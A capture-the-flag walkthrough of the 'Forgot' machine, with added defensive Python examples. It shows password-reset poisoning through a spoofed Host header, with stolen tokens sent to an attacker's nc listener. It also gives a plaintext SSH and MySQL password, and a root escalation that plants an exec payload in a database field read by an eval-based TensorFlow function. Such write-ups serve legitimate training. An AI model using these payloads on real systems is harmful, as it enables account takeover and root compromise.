┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.188

http://10.10.11.188/

http://10.10.11.188/forgot

Here we have a way to enumerate users (for instance, admin exists):

If we take a look at the response headers, we see that the server uses Python (probably Flask) and there are references to Varnish:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl -I 10.10.11.188

Varnish is a web cache, as shown in www.varnish-software.com:

https://www.varnish-software.com/

Actually, this is noticeable when requesting the same resource multiple times. The first response takes about 2 seconds to return, whereas the following requests for the same resource only take a few milliseconds:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl '10.10.11.188/forgot?username=admin' -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl '10.10.11.188/forgot?username=admin' -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl '10.10.11.188/forgot?username=admin' -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl '10.10.11.188/forgot?username=asdf' -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl '10.10.11.188/forgot?username=asdf' -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl '10.10.11.188/forgot?username=asdf' -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ffuf -w /home/kali/Downloads/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://10.10.11.188/FUZZ

http://10.10.11.188/reset

Password reset poisoning

Since there are no more functionalities in the website and common injections do not work (SQLi / NoSQLi), we need to do a bit of research. The name of the machine ("Forgot") and the functionality to restore forgotten passwords are hints about the attack we need to perform. There is a good post on portswigger.net explaining how password reset poisoning works.

The key is to put the IP address of a server we control in the Host header, so that the cached response is poisoned. The application builds the reset link from that Host header, so the legitimate user will then visit our server carrying the reset token:

Source: https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning
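The root cause described above is the application deriving the reset link from the client-supplied Host header. The following is an added example, not code from the write-up or from the Forgot machine: it contrasts link construction that trusts the Host header with a version that uses a configured canonical origin and refuses requests whose Host is not on an allowlist. The canonical origin, the allowlist and the header dictionaries are assumptions for illustration.

```python
"""Added example (not from the original write-up): building a password-reset
link without trusting the client-controlled Host header."""
from urllib.parse import quote

# Assumption: the application learns its own origin from configuration
# (deployment setting / environment variable), never from the request.
CANONICAL_ORIGIN = "http://10.10.11.188"   # target address from the write-up
ALLOWED_HOSTS = {"10.10.11.188"}           # hostnames this app may be reached as


def reset_link_vulnerable(headers, token):
    """Mirrors the weakness the write-up exploits: the link is built from
    whatever Host header arrived with the request, so a cached /forgot
    response (and the e-mail generated from it) can point the victim at an
    attacker-chosen host that then receives the token."""
    host = headers.get("Host", "")
    return f"http://{host}/reset?token={quote(token, safe='')}"


def host_is_trusted(headers):
    """Compare the Host header (port stripped) against the configured
    allowlist. Anything else is rejected before a response is produced,
    so an injected Host never reaches a cacheable page."""
    host = headers.get("Host", "").split(":")[0].strip().lower()
    return host in ALLOWED_HOSTS


def reset_link_hardened(headers, token):
    """Returns None when the Host header is not trusted (the caller should
    answer 400 and mark the response uncacheable); otherwise builds the link
    from CANONICAL_ORIGIN, ignoring Host entirely."""
    if not host_is_trusted(headers):
        return None
    return f"{CANONICAL_ORIGIN}/reset?token={quote(token, safe='')}"


if __name__ == "__main__":
    # Constructed request: Host points at an attacker box (IP from the write-up).
    poisoned = {"Host": "10.10.14.75"}
    print("vulnerable :", reset_link_vulnerable(poisoned, "tok=="))
    print("hardened   :", reset_link_hardened(poisoned, "tok=="))
    print("legit      :", reset_link_hardened({"Host": "10.10.11.188"}, "tok=="))
```

The design point is that there are two independent controls: the link is built from configuration rather than from the request, and requests with an unexpected Host are rejected outright so that nothing derived from the injected header is ever emitted, cached, or mailed.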

The attack seems simple. But first of all, we need to find a valid user different from admin.

Unexpectedly, there was an HTML comment in the main page with a random user:

Let’s switch to curl to poison the cache while listening on port 80 with nc:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 80 

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl '10.10.11.188/forgot?username=robert-dev-87120' -H 'Host: 10.10.14.75'

After a few seconds, we receive a hit in nc:

Incredible, we have the password reset token. Let’s change the password then:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl '10.10.11.188/reset?token=MF4w1hJxE1UEomikyvZQs90ENtIXSwMbnFfn6zaVpMbkgwQllegKJobhMP31K5e1VfEpmDruujw9hyEat8juvA%3D%3D' -d 'password=asdf'

Now we click on the Send button and capture the request:

to=Admin&link=http://10.10.11.188/static/sam.css&reason=&issue=Getting error while accessing search feature in enterprise platform.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl -I http://10.10.11.188/static/sam.css

Now copy the cookie value, update the cookie in the browser, and then try to access /admin_ticket.

Username:diego Password: dCb#1!x0%gjq

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh diego@10.10.11.188

diego@forgot:~$ sudo -l

We are able to run a Python script as root with sudo. This is the script:

diego@forgot:~$ cat /opt/security/ml_security.py

Everything is correct, so we can't get easy code execution by modifying the script or by serializing some malicious payload with pickle. There are no library hijacking options either, since sudo resets the environment variables.

Code injection

The script is related to Machine Learning, but there is a suspicious function being used:

Yes, preprocess_input_exprs_arg_string. This function comes from tensorflow and does not seem related to Machine Learning at all. In fact, if we search a bit, we will find that this function is vulnerable to code injection. More information at security.snyk.io.

Indeed, the version of tensorflow is vulnerable:

diego@forgot:~$ pip freeze | grep tensorflow

The injection occurs in that function because it uses eval. Therefore, we can run arbitrary Python code as root (because we are using sudo).
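To make the root cause concrete, here is an added example (not the write-up's code and not TensorFlow's source) that reproduces the shape of the weakness: a "key=expression" string is split on the first "=" and the right-hand side is handed to eval, so any expression in the data is executed. Next to it is the same parser built on ast.literal_eval, which accepts only Python literals and raises ValueError on calls, names and attribute access. The function names and the sample strings are assumptions for illustration.

```python
"""Added example (not from the write-up or TensorFlow): parsing
'key=expr;key2=expr2' strings with eval versus ast.literal_eval."""
import ast


def parse_input_exprs_unsafe(arg_string):
    """Shape of the vulnerable pattern described in the write-up: the
    right-hand side of each pair goes straight into eval(), so a call such
    as len(...) or __import__(...) embedded in the data is executed."""
    result = {}
    for pair in arg_string.split(";"):
        if not pair.strip():
            continue
        key, expr = pair.split("=", 1)
        result[key.strip()] = eval(expr.strip())  # executes untrusted input
    return result


def parse_input_exprs_safe(arg_string):
    """Same format, but ast.literal_eval only builds Python literals
    (numbers, strings, tuples, lists, dicts, sets, booleans, None) and
    raises ValueError for anything else, so an injected call is rejected
    instead of run."""
    result = {}
    for pair in arg_string.split(";"):
        if not pair.strip():
            continue
        if "=" not in pair:
            raise ValueError(f"expected key=value, got {pair!r}")
        key, expr = pair.split("=", 1)
        result[key.strip()] = ast.literal_eval(expr.strip())
    return result


def rejected_by_safe_parser(arg_string):
    """True when the hardened parser refuses the string: useful as a check
    on data read from an untrusted source (a database column, as in the
    write-up) before it is handed to any eval-based consumer."""
    try:
        parse_input_exprs_safe(arg_string)
    except (ValueError, SyntaxError):
        return True
    return False


if __name__ == "__main__":
    # Constructed sample: a benign literal and a call expression.
    benign = "x=[1, 2, 3];y=4"
    with_call = "x=len('abcd')"
    print("unsafe parser evaluates the call:", parse_input_exprs_unsafe(with_call))
    print("safe parser accepts literals:", parse_input_exprs_safe(benign))
    print("safe parser rejects the call:", rejected_by_safe_parser(with_call))
```

The difference matters because the input reaches the parser from a database column the low-privilege user can write, while the script runs as root: with eval, the parser is a privilege boundary; with literal_eval, it is only a data decoder.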

The variable called data comes from the database:

diego@forgot:~$ mysql --user=diego --password='dCb#1!x0%gjq' --database=app

mysql> show databases;

mysql> use app;

mysql> show tables;

mysql> insert into escalate (reason) values ('x = exec("""__import__("os").system("chmod 4755 /bin/bash")""")');

mysql> exit

Now we will run the script with sudo, which successfully changes the permissions of /bin/bash:

diego@forgot:~$ ls -l /bin/bash

diego@forgot:~$ sudo /opt/security/ml_security.py

diego@forgot:~$ ls -l /bin/bash

diego@forgot:~$ bash -p

@SAKSHAM DIXIT

Hi, I’m saksham dixit
